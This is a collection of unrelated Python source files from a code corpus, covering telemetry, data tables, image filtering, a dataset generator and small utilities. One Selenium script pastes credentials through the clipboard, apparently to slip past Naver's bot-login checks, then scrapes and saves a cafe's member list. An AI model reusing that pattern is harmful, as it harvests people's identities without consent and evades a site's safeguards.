resource=self._sdk_config.resource,\n unit=self._instrument.unit,\n point=_convert_aggregation_temporality(\n previous_point,\n current_point,\n temporality,\n ),\n 
)\n","sub_path":"opentelemetry-sdk/src/opentelemetry/sdk/_metrics/_view_instrument_match.py","file_name":"_view_instrument_match.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"428818503","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport pandas as pd\nimport fire\n\n\ndef runner(in_filename, out_filename):\n \"\"\"\n This table will be used for comparing the various error estimates in the SI.\n \"\"\"\n experiments = [\"Mass density, kg/m3\", \"Relative permittivity at zero frequency\"]\n #experiments = [\"Relative permittivity at zero frequency\"]\n\n X = pd.read_csv(in_filename)\n\n # Precalculate sigma ** -2 for use in weighted variance calculation\n for e in experiments:\n key0 = e + \"_std\"\n key1 = e + \"_std\" + \"_invsquare\"\n X[key1] = X[key0] ** -2.\n\n data = X.groupby([\"components\", \"smiles\", \"cas\", \"Temperature, K\", \"Pressure, kPa\"])[experiments].mean().dropna()\n counts = X.groupby([\"components\", \"smiles\", \"cas\", \"Temperature, K\", \"Pressure, kPa\"])[experiments].count().ix[data.index]\n\n uncertainty_std = X.groupby([\"components\", \"smiles\", \"cas\", \"Temperature, K\", \"Pressure, kPa\"])[experiments].std().ix[data.index]\n\n # What is the groupwise average (and std) of author-reported uncertainties?\n # Currently, not particularly useful because the std is undefined for most cases due to having only a single author-reported uncertainty\n uncertainty_author_averaged = X.groupby([\"components\", \"smiles\", \"cas\", \"Temperature, K\", \"Pressure, kPa\"])[[e + \"_std\" for e in experiments]].mean().ix[data.index]\n uncertainty_author_median = X.groupby([\"components\", \"smiles\", \"cas\", \"Temperature, K\", \"Pressure, kPa\"])[[e + \"_std\" for e in experiments]].median().ix[data.index]\n uncertainty_author_std = X.groupby([\"components\", \"smiles\", \"cas\", \"Temperature, K\", \"Pressure, kPa\"])[[e + \"_std\" for e in experiments]].std().ix[data.index]\n\n # What is the weighted groupwise std of author-reported uncertainties?\n # V(y) = [\\sum_k \\sigma_k^{-2}]^{-1}\n # std(y) = [\\sum_k \\sigma_k^{-2}]^{-0.5}\n # Use precalculated inverse squared uncertainties\n uncertainty_author = X.groupby([\"components\", \"smiles\", \"cas\", \"Temperature, K\", \"Pressure, kPa\"])[[e + \"_std\" + \"_invsquare\" for e in experiments]].sum().ix[data.index] ** -0.5\n\n\n uncertainty_author_median.columns = uncertainty_std.columns # Strip off the _std from column names for now.\n uncertainty_author.columns = uncertainty_std.columns # Strip off the _std from column names for now.\n uncertainty_author_averaged.columns = uncertainty_std.columns # Strip off the _std from column names for now.\n uncertainty_author_std.columns = uncertainty_std.columns # Strip off the _std from column names for now.\n\n\n # Previously preferred the standard deviation, but now we pick the *larger* error estimate.\n #mask = (uncertainty_std.isnull() & (~uncertainty_author.isnull()))\n #uncertainty_bestguess = uncertainty_std.copy()\n #uncertainty_bestguess[mask] = uncertainty_author[mask]\n\n uncertainty_author_median.replace(np.nan, -np.inf, inplace=True)\n uncertainty_author_averaged.replace(np.nan, -np.inf, inplace=True)\n uncertainty_std.replace(np.nan, -np.inf, inplace=True)\n uncertainty_author.replace(np.nan, -np.inf, inplace=True)\n\n uncertainty_bestguess = uncertainty_std.copy()\n ind = uncertainty_author > uncertainty_std\n uncertainty_bestguess[ind] = 
uncertainty_author[ind]\n\n uncertainty_author_median.replace(-np.inf, np.nan, inplace=True)\n uncertainty_author_averaged.replace(-np.inf, np.nan, inplace=True)\n uncertainty_std.replace(-np.inf, np.nan, inplace=True)\n uncertainty_author.replace(-np.inf, np.nan, inplace=True)\n uncertainty_bestguess.replace(-np.inf, np.nan, inplace=True)\n\n for e in experiments:\n data[e + \"_uncertainty_std\"] = uncertainty_std[e]\n data[e + \"_uncertainty_author_weighted\"] = uncertainty_author[e]\n data[e + \"_uncertainty_author_averaged\"] = uncertainty_author_averaged[e]\n data[e + \"_uncertainty_author_median\"] = uncertainty_author_median[e]\n data[e + \"_uncertainty_bestguess\"] = uncertainty_bestguess[e]\n data[e + \"_counts\"] = counts[e]\n\n data.to_csv(out_filename)\n\n\nif __name__ == \"__main__\":\n fire.Fire(runner)\n","sub_path":"code/create_data_table_for_si.py","file_name":"create_data_table_for_si.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"321183510","text":"import sys\nimport io\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nimport pyperclip\nfrom bs4 import BeautifulSoup\nimport time\n\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')\n\nclass NcafeWriteAtt :\n #초기화 실행(webdriver설정)\n def __init__(self) :\n option = Options()\n # option.add_argument(\"--headless\") #cli\n self.driver = webdriver.Chrome(chrome_options=option, executable_path=r\"D:/dh/Python_atom/section3/webdriver/Chrome/chromedriver\")\n self.driver.implicitly_wait(5)\n\n def getMemberList(self) :\n self.driver.get('https://nid.naver.com/nidlogin.login')\n\n pyperclip.copy('') #아이디입력\n self.driver.find_element_by_name('id').click()\n ActionChains(self.driver).key_down(Keys.CONTROL).send_keys('v').key_up(Keys.CONTROL).perform()\n\n\n pyperclip.copy('') #비밀번호 입력\n self.driver.find_element_by_name('pw').click()\n ActionChains(self.driver).key_down(Keys.CONTROL).send_keys('v').key_up(Keys.CONTROL).perform()\n\n\n\n self.driver.find_element_by_xpath('//*[@id=\"log.login\"]').click()\n time.sleep(15)\n self.driver.implicitly_wait(5)\n self.driver.get('https://cafe.naver.com/CafeMemberViewTab.nhn?defaultSearch.clubid=19756449')\n self.driver.implicitly_wait(5)\n self.driver.switch_to_frame('cafe_main')\n\n\n #--\n # self.driver.implicitly_wait(5)\n # soup = BeautifulSoup(self.driver.page_source, 'html.parser')\n\n\n #--\n self.list = []\n stoppi = 0\n pagep = 2\n run = True\n while run :\n if stoppi > 0 :\n pagep = 3\n try :\n for i in range(10) :\n self.driver.find_element_by_css_selector(\"#main-area > div.prev-next > a:nth-child(\"+str(i+pagep)+\")\").click()\n\n time.sleep(0.05)\n tmpList = self.driver.find_elements_by_css_selector(\"div.ellipsis.m-tcol-c\")\n for j in range(len(tmpList)) :\n self.list.append(tmpList[j].text.strip())\n self.driver.find_element_by_css_selector(\"#main-area > div.prev-next > a.pgR\").click()\n \n except Exception as e :\n print(e)\n run = False\n stoppi += 1\n if stoppi == 5 : #5페이지\n run = False\n\n time.sleep(3)\n return self.list\n\n def __del__(self) :\n self.driver.quit()\n print(\"Removed driver Object\")\n\n#실행 메인\n\nif __name__ == '__main__' :\n #객체 생성\n a = NcafeWriteAtt()\n start_time = time.time()\n list = a.getMemberList()\n\n 
print(\"---Total %s seconds \" % (time.time()-start_time))\n time.sleep(10)\n members = \"\"\n for i in list :\n print(i)\n members += i+\"\\n\"\n members += \"총\"+str(len(list))+\"명\"\n print(\"총\",len(list),\"명\")\n\n savePath = \"D:/dh/Python_atom_a/memberList.txt\"\n with open(savePath, 'wt') as saveFile :\n saveFile.write(members)\n\n del a\n","sub_path":"section3/3-7-2.py","file_name":"3-7-2.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"87947346","text":"import time\nimport machine\nimport onewire, ds18x20\n\n# the device is on GPIO12\ndat = machine.Pin(4)\n\n# create the onewire object\nds = ds18x20.DS18X20(onewire.OneWire(dat))\n\n# scan for devices on the bus\nroms = ds.scan()\nprint('found devices:', roms)\n\ndef get_temps():\n ds.convert_temp()\n time.sleep_ms(750)\n\n temps = []\n for rom in roms:\n temp = ds.read_temp(rom)\n temp = (temp * 9 / 5) + 32\n temps.append(temp)\n return temps\n","sub_path":"esp8266/temp_sense.py","file_name":"temp_sense.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"269444274","text":"import json\nimport os\nimport datetime\n\nfrom utl.notifier import Notifier\nfrom utl.database.models import models\nfrom utl.database.functions.models.users import getAllUsersInfo\nfrom utl.database.functions.models.savedOpportunities import getSavedOpportunities, removeOpportunityReminder\nfrom utl.database.functions.models.savedScholarships import getSavedScholarships, removeScholarshipReminder\nfrom __init__ import app\n\ndb = models.db\n\nDIR = os.path.dirname(__file__) or \".\"\nDIR += \"/\"\npath = DIR + \"../gmail.json\"\n\nf = open(path)\nf = json.load(f)\n\nuser = f['gmail']\npwd = f['password']\n\nbaseurl = \"http://127.0.0.1:5000\"\n\n\ndef findReminderIso(date):\n return (date - datetime.timedelta(days=7)).date().isoformat()\n\n\ndef constructSection(html, l, name):\n if len(l) > 0:\n html += f\"

Here are all of your favorited {name} that have deadlines next week:

\"\n for obj in l:\n id = obj.opportunityID if name == 'opportunities' else obj.scholarshipID\n html += f\"{obj.title}
\"\n return html\n\n\ndef constructBody(opportunities, scholarships, time):\n html = \"\"\n html = constructSection(html, opportunities, 'opportunities')\n html = constructSection(html, scholarships, 'scholarships')\n html += \"
--
Caerus\"\n return html\n\n\nif __name__ == \"__main__\":\n db.init_app(app)\n with app.app_context():\n db.create_all()\n notifier = Notifier(user, pwd)\n users = getAllUsersInfo()\n for user in users:\n\n time = datetime.datetime.now()\n iso = time.date().isoformat()\n\n savedOpps = getSavedOpportunities(user.userID)\n savedScholars = getSavedScholarships(user.userID)\n\n savedOpps = [opp for opp in savedOpps if opp.deadline != None]\n savedScholars = [s for s in savedScholars if s.deadline != None]\n\n savedOpps = [\n opp for opp in savedOpps\n if findReminderIso(opp.deadline) == iso\n ]\n savedScholars = [\n s for s in savedScholars\n if findReminderIso(s.deadline) == iso]\n\n if len(savedOpps) > 0 or len(savedScholars) > 0:\n html = constructBody(savedOpps, savedScholars, time)\n\n notifier.sendmail(\n [user.email], f\"Caerus Reminder -- {iso}\", html\n )\n print(\n f\"Reminder email sent to {user.email} -- {time.isoformat()}\")\n","sub_path":"app/reminder.notify.py","file_name":"reminder.notify.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"648777971","text":"# url = 'https://www.acmicpc.net/problem/13460'\n\nN, M = map(int, input().split())\narr = [list(input()) for _ in range(N)]\nfor y in range(N):\n for x in range(M):\n if arr[y][x] == 'R':\n red = (x, y)\n elif arr[y][x] == 'B':\n blue = (x, y)\n\ndef find(cnt, rx, ry, bx, by):\n for i in range(4):\n nx, ny = rx+dx[i], ry+dy[i]\n if arr[ny][nx] == '#':\n continue\n if (nx, ny) == (bx, by):\n if arr[by+dy[i]][bx+dx[i]] == '#':\n continue\n q.append((cnt, i, (rx, ry), (bx, by)))\n\n\ndx, dy = (0, 1, 0, -1), (-1, 0, 1, 0)\n\nq = []\nfind(0, red[0], red[1], blue[0], blue[1])\nprint(q)\nwhile q:\n cnt, d, red, blue = q.pop(0)","sub_path":"Samsung/13460. 구슬 탈출 2.py","file_name":"13460. 
구슬 탈출 2.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"393345554","text":"from datetime import datetime\nimport logging\nimport src.my_sql as my_sql\n\nmodule_logger = logging.getLogger('main.budget')\n\nclass Budget():\n __singleton = None\n __start_year = 2018\n __end_year = 2050\n\n def __new__(cls, *args, **kwargs):\n \"\"\"\n Singleton: Just one instance of Budget is possible at a time\n \"\"\"\n\n if not cls.__singleton:\n cls.__singleton = super().__new__(Budget)\n return cls.__singleton\n\n\n def __init__(self, id=1, year=datetime.now().year ,comment='Some text'):\n \"\"\"\n Initialize main parameters\n \"\"\"\n self.logger = logging.getLogger('main.budget.Budget')\n self.id = id\n\n try:\n self.year = int(year)\n except Exception:\n self.year = Budget.__start_year\n self.logger.warning('\\n Can not be casted to int: {} --> {}'.format(repr(year), self.year))\n finally:\n if self.year not in range(Budget.__start_year, Budget.__end_year):\n self.year = Budget.__start_year\n self.logger.warning('\\n Out of range: {} --> {}'.format(repr(year), self.year))\n\n self.comment = comment\n\n def get_id(self):\n return self.id\n\n\n @classmethod\n def create_table_budget( cls, my_db, table_name ):\n \"\"\"Create new 'budget' table\"\"\"\n cls.my_db = my_db\n cls.table_name = table_name\n my_db.create_table( my_sql.create_table_budget(cls.table_name) )\n\n\n\n\nif __name__ == '__main__':\n pass\n\n","sub_path":"src/budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"267084487","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef jbf(image_D, image_C, w, sigma_f, sigma_g):\r\n\r\n res_image = image_D.copy()\r\n distance = np.zeros([w, w], dtype=np.float)\r\n # 算出滤波窗口内的距离\r\n for m in range(w):\r\n for n in range(w):\r\n distance[m, n] = (m - w//2) ** 2 + (n - w//2) ** 2\r\n\r\n for i in range(w//2, image_C.shape[0] - w//2):\r\n for j in range(w//2, image_C.shape[1] - w//2):\r\n for d in range(3):\r\n # 计算当前窗口范围\r\n istart = i - w//2\r\n iend = i + w//2\r\n jstart = j - w//2\r\n jend = j + w//2\r\n # 原图的当前窗口\r\n window_s = image_D[istart:iend + 1, jstart: jend + 1, d]\r\n # 引导图的当前窗口\r\n window_g = image_C[istart:iend + 1, jstart: jend + 1, d]\r\n # 由引导图像的灰度值差计算值域核\r\n f = np.exp(-0.5 * distance / (sigma_f ** 2))\r\n g = np.exp(-0.5 * (window_g - image_C[i, j, d]) ** 2 / (sigma_g ** 2))\r\n # 根据公式给出\r\n res_image[i, j, d] = np.sum(g * f * window_s) / np.sum(g * f)\r\n # print(res_image)\r\n return res_image\r\n\r\n\r\ndef bilinear(img, rate):\r\n # 双线性插值\r\n x, y = int(img.shape[0]*rate), int(img.shape[1]*rate)\r\n res_img = np.zeros((x, y, 4), dtype=np.float)\r\n for i in range(x):\r\n for j in range(y):\r\n temp_x = int(i / rate)\r\n temp_y = int(j / rate)\r\n u = i / rate - temp_x\r\n v = j / rate - temp_y\r\n # 防止边缘越界\r\n m1 = min(temp_x + 1, img.shape[0] - 1)\r\n n1 = min(temp_y + 1, img.shape[1] - 1)\r\n # 双线性插值的式子\r\n res_img[i, j, :] = img[temp_x, temp_y, :] * (1 - u) * (1 - v) + img[m1, n1, :] * (1-u) * v + img[m1, temp_y, :] * u * (1-v) + img[temp_x, n1, :] * u * v\r\n return res_img\r\n\r\n\r\n#得到引导图像\r\nimage_path1 = './images/pro_2/b.png'\r\nplt.subplot(1, 3, 1)\r\nsource_img = plt.imread(image_path1)\r\nplt.imshow(source_img)\r\nplt.subplot(1, 3, 2)\r\nimg = bilinear(source_img, 1/2)\r\nimg_2 = bilinear(img, 2)\r\nplt.imshow(img_2)\r\n# 
进行联合双边滤波\r\nplt.subplot(1, 3, 3)\r\nres_image = jbf(source_img, img_2, 9, 11, 3)\r\nplt.imshow(res_image)\r\nplt.show()\r\n","sub_path":"experiment_2_2.py","file_name":"experiment_2_2.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"588050404","text":"from typing import Dict, List, Tuple\nimport torch \nfrom torch.utils.data import Dataset \nimport os\nimport pickle \nimport numpy as np\nimport random\nimport cv2\nfrom PIL import Image \nfrom tqdm import tqdm\n\n\ndef generate_dataset(root,\n dataset_size=10000,\n img_size=75,\n object_size=5,\n nb_objects=6\n ):\n '''\n Inspired by: https://github.com/kimhc6028/relational-networks/blob/master/sort_of_clevr_generator.py\n '''\n \n '''\n question_size = 11 ##6 for one-hot vector of color, 2 for question type, 3 for question subtype\n \"\"\"Answer : [yes, no, rectangle, circle, r, g, b, o, k, y]\"\"\"\n '''\n question_size = nb_objects+5 \n ## nb_objects(==nb_colors) for one-hot vector of color, 2 for question type, 3 for question subtype\n \"\"\"Answer : [yes, no, rectangle, circle, *colors]\"\"\"\n \n dirs = root \n \n colors = [\n (0,0,255),##r\n (0,255,0),##g\n (255,0,0),##b\n (0,156,255),##o\n (128,128,128),##k\n (0,255,255)##y\n ]\n assert(nb_objects<=6)\n colors = colors[:nb_objects]\n \n shapes = [\n \"circle\",\n \"rectangle\"\n ]\n \n '''\n # 0, as a class, is a lack of object (no color/ no shape):\n latent_one_hot_repr_sizes = {\"color\":len(colors)+1,\n \"shape\":len(shapes)+1,\n }\n\n size_one_hot_vec_per_object = sum([v for k,v in latent_one_hot_repr_sizes.items()])\n nb_attr_per_object = len(latent_one_hot_repr_sizes)\n '''\n\n pos_X = np.arange(object_size, img_size-object_size+1, 2*object_size)\n pos_Y = np.arange(object_size, img_size-object_size+1, 2*object_size)\n nb_colors = len(colors)\n nb_shapes = len(shapes)\n nX = len(pos_X)\n nY = len(pos_Y)\n latent_one_hot_repr_sizes = {\n \"color\":nb_colors, #similar to id\n \"shape\":nb_shapes,\n \"pos_X\":nX,\n \"pos_Y\":nY,\n }\n\n one_object_latents_ones_hot_size = sum([v for k,v in latent_one_hot_repr_sizes.items()])\n \n possible_Y_values = pos_Y \n possible_X_values = pos_X \n possible_shape_values = np.arange(0,len(shapes))\n possible_color_values = np.arange(0,len(colors))\n possible_object_id_values = np.arange(0,nb_objects)\n\n dummy_latent_values = np.zeros(4).astype(int)\n dummy_latent_class = np.zeros(4).astype(int)\n # (4, )\n dummy_latent_one_hot = np.zeros(one_object_latents_ones_hot_size).astype(int)\n\n def generate_obj_latents(obj):\n '''\n :param obj: (color_id, (cx, cy) , shape_str, bx, by)\n '''\n color_id = obj[0]\n shape_id = 0 if obj[2] == 'r' else 1\n xid = obj[-2]\n posx = obj[1][0]\n yid = obj[-1]\n posy = obj[1][1]\n\n obj_latent_class = dummy_latent_class.copy()\n obj_latent_values = dummy_latent_values.copy()\n obj_latent_one_hot = dummy_latent_one_hot.copy()\n\n one_hot_idx_start = 0\n\n # Color:\n obj_latent_class[0] = color_id\n obj_latent_values[0] = color_id\n obj_latent_one_hot[one_hot_idx_start+color_id] = 1\n\n # Shape:\n obj_latent_class[1] = shape_id\n obj_latent_values[1] = shape_id\n one_hot_idx_start_shape = one_hot_idx_start+nb_colors\n obj_latent_one_hot[one_hot_idx_start_shape+shape_id] = 1\n\n # X:\n obj_latent_class[2] = xid \n obj_latent_values[2] = posx \n one_hot_idx_start_px = one_hot_idx_start_shape+nb_shapes\n obj_latent_one_hot[one_hot_idx_start_px+xid] = 1\n \n # Y:\n obj_latent_class[3] = yid \n obj_latent_values[3] = 
posy \n one_hot_idx_start_py = one_hot_idx_start_px+nX\n obj_latent_one_hot[one_hot_idx_start_py+yid] = 1\n \n return obj_latent_class, obj_latent_values, obj_latent_one_hot\n\n def find_pos_side_bucket(coord, pos_side):\n return max(0, coord-1) // (2*object_size)\n\n def generate_center_coord(objects):\n while True:\n pas = True\n center = np.random.randint(0+object_size, img_size - object_size, 2) \n if len(objects) > 0:\n for obj in objects:\n name,c,shape = obj[:3]\n if ((center - c) ** 2).sum() < ((object_size * 2) ** 2):\n pas = False\n if pas:\n return center\n\n def generate_datapoint():\n objects = []\n img = np.ones((img_size,img_size,3)) * 255\n for color_id,color in enumerate(colors[:nb_objects]): \n center = generate_center_coord(objects)\n bx = find_pos_side_bucket(center[0], pos_X)\n by = find_pos_side_bucket(center[1], pos_Y)\n if random.random()<0.5:\n start = (center[0]-object_size, center[1]-object_size)\n end = (center[0]+object_size, center[1]+object_size)\n cv2.rectangle(img, start, end, color, -1)\n objects.append((color_id,center,'r',bx,by))\n else:\n center_ = (center[0], center[1])\n cv2.circle(img, center_, object_size, color, -1)\n objects.append((color_id,center,'c',bx,by))\n\n # building latents:\n per_obj_latents = [ generate_obj_latents(obj) for obj in objects]\n img_latent_class, img_latent_values, img_latent_one_hot = [*zip(*per_obj_latents)]\n \n img_latent_class = np.concatenate(img_latent_class, axis=0)\n img_latent_values = np.concatenate(img_latent_values, axis=0)\n img_latent_one_hot = np.concatenate(img_latent_one_hot, axis=0)\n \n objects = [ obj_latent for obj_latent in img_latent_values.reshape((-1,4))]\n \n rel_questions = {st:[] for st in range(3)}\n norel_questions = {st:[] for st in range(3)}\n rel_answers = {st:[] for st in range(3)}\n norel_answers = {st:[] for st in range(3)}\n\n original_question = np.zeros((question_size))\n\n \"\"\"Non-relational questions\"\"\"\n for subtype_id in range(3):\n for color_object_id in range(len(colors)):\n question = original_question.copy()\n # What color is the object we are considering, \n # i.e. which object are we considering? \n question[color_object_id] = 1\n # non-relational question\n question[nb_objects] = 1\n # subtype :\n question[nb_objects+2+subtype_id] = 1\n \"\"\"\n Answer : [yes, no, 1~nb_objects(shapes), 1~nb_objects(count)]\n \"\"\"\n if subtype_id == 0:\n \"\"\"query shape->1~nb_shape\"\"\"\n # Account for yes/no :\n answer_idx = 2+objects[color_object_id][1] \n #from idx 0 to nb_shape-1\n elif subtype_id == 1:\n \"\"\"query horizontal (X) position->yes/no\"\"\"\n if objects[color_object_id][2] < img_size / 2:\n answer_idx = 0\n # yes\n else:\n answer_idx = 1\n # no\n elif subtype_id == 2:\n \"\"\"query vertical (Y) position->yes/no\"\"\"\n if objects[color_object_id][3] < img_size / 2:\n answer_idx = 0\n # yes\n else:\n answer_idx = 1\n # no\n norel_questions[subtype_id].append(question)\n norel_answers[subtype_id].append(answer_idx)\n \n \"\"\"Relational questions\"\"\"\n for subtype_id in range(3):\n for color_object_id in range(len(colors)):\n question = original_question.copy()\n # What color is the object we are considering, \n # i.e. what object are we considering? 
\n question[color_object_id] = 1\n # relational question\n question[nb_objects+1] = 1\n # subtype :\n question[nb_objects+2+subtype_id] = 1\n \"\"\"\n Answer : [yes, no, 1~nb_shapes, 1~nb_objects(count)]\n \"\"\"\n if subtype_id == 0:\n \"\"\"\n closest-to->1~nb_shapes\n \"\"\"\n my_obj_pos = np.asarray([objects[color_object_id][2],objects[color_object_id][3]])\n dist_list = [((my_obj_pos - np.asarray([obj[2],obj[3]])) ** 2).sum() \n for idx, obj in enumerate(objects)]\n # We make sure that we are not going to sample the object we are considering:\n dist_list[dist_list.index(0)] = 999\n closest_id_in_dist_list = dist_list.index(min(dist_list))\n closest = objects[closest_id_in_dist_list][0]\n closest_shape_id = objects[closest][1]\n answer_idx = 2+closest_shape_id\n elif subtype_id == 1:\n \"\"\"\n furthest-from->1~nb_shapes\n \"\"\"\n my_obj_pos = np.asarray([objects[color_object_id][2],objects[color_object_id][3]])\n dist_list = [((my_obj_pos - np.asarray([obj[2],obj[3]])) ** 2).sum() \n for idx,obj in enumerate(objects)]\n furthest_id_in_dist_list = dist_list.index(max(dist_list))\n furthest = objects[furthest_id_in_dist_list][0]\n furthest_shape_id = objects[furthest][1]\n answer_idx = 2+furthest_shape_id\n elif subtype_id == 2:\n \"\"\"\n count-same-shape->1~nb_objects(count)\n \"\"\"\n my_obj_shape_id = objects[color_object_id][1]\n count = -1\n for obj_id, obj in enumerate(objects):\n if obj[1] == my_obj_shape_id:\n count +=1 \n answer_idx = 2+nb_shapes+count\n # from idx 2+nb_objects (i.e. count=0, \n # which is actually 1 object of the given shape, \n # obtained when checking that very object from \n # the list of objects ...)\n # to idx 2+nb_objects + (nb_objects-1) = 3 + nb_objects\n # (i.e. count=nb_objects-1,\n # which is actually nb_objects objects of the given shape).\n\n rel_questions[subtype_id].append(question)\n rel_answers[subtype_id].append(answer_idx)\n\n # Dict of keys 0,1,2 (subtypes) and values are list of questions (one_hot_vec):\n norelations = (norel_questions, norel_answers)\n relations = (rel_questions, rel_answers)\n \n #img = (img/255.).transpose((2,0,1))\n img = (img).astype('uint8').transpose((2,1,0))\n\n datapoint = (img, \n relations, \n norelations, \n img_latent_class.reshape(-1), \n img_latent_values.reshape(-1),\n img_latent_one_hot.reshape(-1))\n \n return datapoint\n\n print('building test datasets...')\n dataset = {\n \"imgs\":[],\n \"latents_values\":[],\n \"latents_classes\":[],\n \"latents_one_hot\":[],\n \"relational_qs_0\":[],\n \"relational_qs_1\":[],\n \"relational_qs_2\":[],\n \"non_relational_qs_0\":[],\n \"non_relational_qs_1\":[],\n \"non_relational_qs_2\":[],\n \"relational_as_0\":[],\n \"relational_as_1\":[],\n \"relational_as_2\":[],\n \"non_relational_as_0\":[],\n \"non_relational_as_1\":[],\n \"non_relational_as_2\":[],\n }\n\n pbar = tqdm(total=dataset_size)\n for _ in range(dataset_size):\n pbar.update(1)\n\n datapoint = generate_datapoint()\n #(img, relations, norelations, latent_class, latent_values, latent_one_hot)\n dataset['imgs'].append(datapoint[0])\n dataset['latents_classes'].append(datapoint[-3])\n dataset['latents_values'].append(datapoint[-2])\n dataset['latents_one_hot'].append(datapoint[-1])\n \n dataset['relational_qs_0'].append(np.stack(datapoint[1][0][0]))\n dataset['relational_qs_1'].append(np.stack(datapoint[1][0][1]))\n dataset['relational_qs_2'].append(np.stack(datapoint[1][0][2]))\n dataset['non_relational_qs_0'].append(np.stack(datapoint[2][0][0]))\n 
dataset['non_relational_qs_1'].append(np.stack(datapoint[2][0][1]))\n dataset['non_relational_qs_2'].append(np.stack(datapoint[2][0][2]))\n \n dataset['relational_as_0'].append(np.asarray(datapoint[1][1][0]))\n dataset['relational_as_1'].append(np.asarray(datapoint[1][1][1]))\n dataset['relational_as_2'].append(np.asarray(datapoint[1][1][2]))\n dataset['non_relational_as_0'].append(np.asarray(datapoint[2][1][0]))\n dataset['non_relational_as_1'].append(np.asarray(datapoint[2][1][1]))\n dataset['non_relational_as_2'].append(np.asarray(datapoint[2][1][2]))\n\n print('saving dataset...')\n filename = os.path.join(dirs,'sort-of-clevr.pickle')\n with open(filename, 'wb') as f:\n pickle.dump(dataset, f)\n print('dataset saved at {}'.format(filename))\n\n return dataset\n\n\nclass SortOfCLEVRDataset(Dataset):\n def __init__(self, \n root, \n train=True, \n transform=None, \n generate=False,\n dataset_size=10000,\n test_size=2000,\n img_size=75,\n object_size=5,\n nb_objects=6,\n test_id_analogy=False,\n test_id_analogy_threshold=3,\n ):\n super(SortOfCLEVRDataset, self).__init__()\n \n self.root = root\n self.file = 'sort-of-clevr.pickle' \n self.transform = transform \n self.nb_objects = nb_objects\n self.test_id_analogy = test_id_analogy\n self.test_id_analogy_threshold = test_id_analogy_threshold\n assert self.test_id_analogy_threshold < self.nb_objects,\\\n \"Looks like you are trying to test analogy without enough \\\n supporting evidence.\"\n\n if not self._check_exists():\n if generate:\n dataset = self._generate(root=root,\n dataset_size=dataset_size,\n img_size=img_size,\n object_size=object_size,\n nb_objects=nb_objects)\n else:\n raise RuntimeError('Dataset not found. You can use download=True to download it')\n else:\n filepath = os.path.join(self.root, self.file)\n with open(filepath, 'rb') as f:\n dataset = pickle.load(f)\n \n self.train = train \n # TODO: handle train tes tsplit:\n\n self.imgs = np.asarray(dataset['imgs'])\n self.latents_values = np.asarray(dataset['latents_values'])\n #(color, shape, X, Y) :\n self.latents_classes = np.asarray(dataset['latents_classes'])\n self.latents_one_hot = np.asarray(dataset['latents_one_hot'])\n \n self.relational_qs = {idx:np.stack(dataset[f'relational_qs_{idx}']) for idx in range(3)}\n self.non_relational_qs = {idx:np.stack(dataset[f'non_relational_qs_{idx}']) for idx in range(3)}\n self.relational_as = {idx:np.stack(dataset[f'relational_as_{idx}']) for idx in range(3)}\n self.non_relational_as = {idx:np.stack(dataset[f'non_relational_as_{idx}']) for idx in range(3)}\n\n sampling_indices = np.random.randint(len(self.imgs), size=test_size)\n if self.train:\n sampling_indices = [idx for idx in range(len(self.imgs)) if idx not in sampling_indices]\n\n self.imgs = self.imgs[sampling_indices]\n self.latents_values = self.latents_values[sampling_indices]\n self.latents_classes = self.latents_classes[sampling_indices]\n self.latents_one_hot = self.latents_one_hot[sampling_indices]\n\n self.relational_qs = {k:v[sampling_indices] for k,v in self.relational_qs.items()}\n self.non_relational_qs = {k:v[sampling_indices] for k,v in self.non_relational_qs.items()}\n self.relational_as = {k:v[sampling_indices] for k,v in self.relational_as.items()}\n self.non_relational_as = {k:v[sampling_indices] for k,v in self.non_relational_as.items()}\n\n self.targets = np.zeros(len(self.latents_classes))\n weights = [np.power(2,idx) for idx in range(self.nb_objects)]\n\n for idx, latent_cls in enumerate(self.latents_classes):\n img_shapes = [latent_cls[idx_shape] 
\n for idx_shape in range(1,self.nb_objects*4, 4)\n ]\n img_shapes = [sh*w for sh, w in zip(img_shapes,weights)]\n target = sum(img_shapes)\n self.targets[idx] = target\n\n\n def __len__(self) -> int:\n return len(self.imgs)\n \n def _check_exists(self):\n return os.path.exists(os.path.join(self.root,self.file))\n\n def _generate(self, \n root,\n dataset_size,\n img_size,\n object_size,\n nb_objects):\n \"\"\"\n Generate the Sort-of-CLEVR dataset if it doesn't exist already.\n \"\"\"\n if root is None:\n root = self.root\n os.makedirs(root, exist_ok=True)\n return generate_dataset(root=root,\n dataset_size=dataset_size,\n img_size=img_size,\n object_size=object_size,\n nb_objects=nb_objects\n )\n\n def getclass(self, idx):\n if idx >= len(self):\n idx = idx%len(self)\n target = self.targets[idx]\n return target\n\n def getlatentvalue(self, idx):\n if idx >= len(self):\n idx = idx%len(self)\n latent_value = self.latents_values[idx]\n return latent_value\n\n def getlatentclass(self, idx):\n if idx >= len(self):\n idx = idx%len(self)\n latent_class = self.latents_classes[idx]\n return latent_class\n\n def getlatentonehot(self, idx):\n if idx >= len(self):\n idx = idx%len(self)\n latent_one_hot = self.latents_one_hot[idx]\n return latent_one_hot\n\n def __getitem__(self, idx):\n 